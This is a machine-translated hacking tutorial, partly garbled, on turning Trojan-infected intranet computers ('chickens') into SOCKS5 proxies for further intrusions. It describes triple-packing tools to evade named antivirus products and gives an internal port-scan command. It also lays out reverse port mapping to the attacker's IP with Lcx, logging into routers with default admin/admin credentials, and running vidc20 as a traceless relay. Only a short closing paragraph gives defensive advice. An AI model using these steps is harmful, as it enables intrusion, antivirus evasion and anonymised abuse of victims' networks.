After a lot of chickens have been put on the horse, the black friends may be thinking about how to use the loot in their hands. Some people like to spy on the privacy of others, some may use the Trojan horse keylogger to steal someone's QQ password, some people may want to steal someone's broadband Internet access account charge Q currency. But have you ever thought that these chickens in the intranet into a SOCKS5 server? In this way, we can use these chickens as a springboard for future invasions, and the blacks will be much safer. Some people say that the intranet as a SOCKS5 server is impossible, even if it is not available, good, today I will be some of my practical experience to share with you, there is no technical content, we exchange, if you have a better way, but also please enlighten yo!
First introduced the use of the tool, Lcx.exe this is a reverse connection of the Intranet port mapping tool, VIDC20.exe is also a port mapping tool, but it also has the function of proxy server, support HTTP/SOCKS4/SOCKS5 agent, support agent authentication, support UDP proxy, Support Level two agent, and S-scanner, this only one executable file, small and convenient, sweep port is the most suitable. These tools are downloaded on the Internet, before the agent service, we need to do a little kill, because most anti-virus software is to kill Lcx.exe and S scanner, if not to kill, that an upload may be antivirus software to kill, 1:
Figure 1
Like this intrepid Kabbah, there is no way to stop under the command line, so only to do not kill, other anti-virus software in the command line can be aborted, but need some skills, because they are wired to protect, with the conventional method is not stop. I have been in the command line under the rising, but the method is more cumbersome, so it is not here to demonstrate. As for the method of killing, as long as the simple add the shell can pass, according to my experiment, first add a Beidou 3.5, plus aspack 2.12, and then add the Beidou 3.5, so after most of the killing software will not kill the two programs, hehe. Simple, anti-virus software will be treated differently, if it is some popular Trojan, plus this triple shell is not to kill, for some less important hacker tools, anti-virus software will appear relatively loose more. We are drilling anti-virus software this loophole, if it is added triple shell also can not antivirus software, then do not be afraid of trouble will their signature to modify, you can have anti-virus software, modify the method on the web there are many animations, we can find their own, my pcshare horse is done, over the Kabbah, rising, jiangmin , rising, Jinshan, Norton, Trends and other anti-virus software is very easy, but also easy to cross a variety of horse tools, this is my signature after the addition of the triple Shell made, a powerful tool. Oh. Some of them are off the topic.
After the tool is ready, the agent is started below. First open your Trojan client program, the above tools uploaded to the intranet in the broiler, put in the Windows directory, it is better to change the file name, so as not to arouse the attention of the other side. Open the other's command, type the command: Ipconfig/all look at the IP address of the broiler, such as: 192.168.0.2, get the IP address of this machine and gateway, we can use the S scanner to the same network segment of the IP address to scan, see what type of this broiler gateway. s scanner I believe everyone will use it.
Command line: S-JK TCP 192.168.0.1 192.168.0.255 80,23,3389,1433,139,445 20
This s-jk is I add triple shell after the S scanner, this command in the entire network segment scanning open 139 3389 1433 80 23 port host, hehe, this is to infiltrate the internal network to prepare, perhaps have very important information appears. Ha ha. Scan results such as 2:
Figure 2
After the scan found that the chicken's gateway opened Port 80th, which indicates that the gateway must be a router. How do I log in to its router? We all know that the broadband router in the external network is not able to log in, only by its internal network login, it is to enter the chicken screen control, with the chicken's IE login? Not also, this is very easy to expose, and then the chicken on the administrator may now be working in front of the computer, you have no way to control, the following on their own computer to open a command prompt, command: Lcx-listen 21 8000 back to the broiler cmd, command: Lcx-slave 218.57.179.152 21 192.168.0.1 80 Explanation: 218.57.179.152 is my external network IP, so that the chicken's broadband router 80 port mapped to the 21 end of my computer, I connect the 8000 port of the machine can be. 3:
Figure 3
The next step is to open IE, the Address bar type: http://127.0.0.1:8000 return, the long-awaited and familiar login interface appears. This is the broadband router login interface, but this is not my broadband router, but another LAN broadband router, I am proficient in typing the default user name and password, admin admin, OK after the successful login. 4, Figure 5.
Figure 4
Figure 5
The next job is simply pro, set a virtual server point to this broiler, the port is set to a strange port, do not set to 8080, because the broadband router to use this port, it is not allowed to set this port, I set the 2233, after saving, we go back to the chicken command line , command: vidc20-d-P 2233 This command means to start Vidc20.exe this program as a console, and to open 2233 service ports to provide proxy services. This broiler has already started to provide SOCK5 service, and the mapping on the router has been working, we have to do is to open the SOCK5 client program, set the SOCKS5 server IP address and port, that is, the chicken's external network IP. We drag the IE icon to the SOCKSCAP32 icon to create a new shortcut, so that we can log in to the ASP when the horse will be able to double-click the SOCKSCAP32 in the IE to log in. If you don't feel comfortable, You can log in to www.123cha.com, to see the IP,IP address is the IP of your broiler, using this proxy is more secure than using an anonymous HTTP proxy, because to provide you with a proxy is a personal computer, and IP is not fixed, within a LAN, there is no monitoring software to record any connection, and this one The computer restarts after the Vidc20.exe is not running, it can be said that no traces, so that even if someone to track your words, you can only find the IP of your chickens, and then want to continue to trace it is not easy.
Some people say that if the administrator to change the password of the broadband router, it is not without play, I randomly selected five LAN for testing, all is the default password, it seems to set the default password probability is full high. I analyzed the reason: One, may be broadband routers can only be connected by the intranet, the administrator of their lack of awareness of the security. Second, the computer users in the intranet are rookie, do not need to make security settings. Third, the administrator slack, did not take it seriously. To be honest, my broadband router is also the default password set, why not get rid of it? I think I should belong to the second situation, the intranet is all rookie users, so it is necessary to modify, so that the exposure of a security problem, once the computer in the intranet Trojan, intruders may have access to your broadband account, with your broadband account brush Q currency, brush business Or you may log in to your ISP to change your broadband account number to make it impossible for you to go online. If the intruder takes you as a springboard, he has done bad things by you blame, that is not even more wronged. Therefore, we must improve the security of the internal network to raise vigilance. Hit the patch, the modified default password to modify, so that it can withstand the majority of the primary intruder attacks. But to be absolutely safe, that is impossible, there is no absolute security in the world.
Hackers teach you to make an intranet chicken SOCKS5 server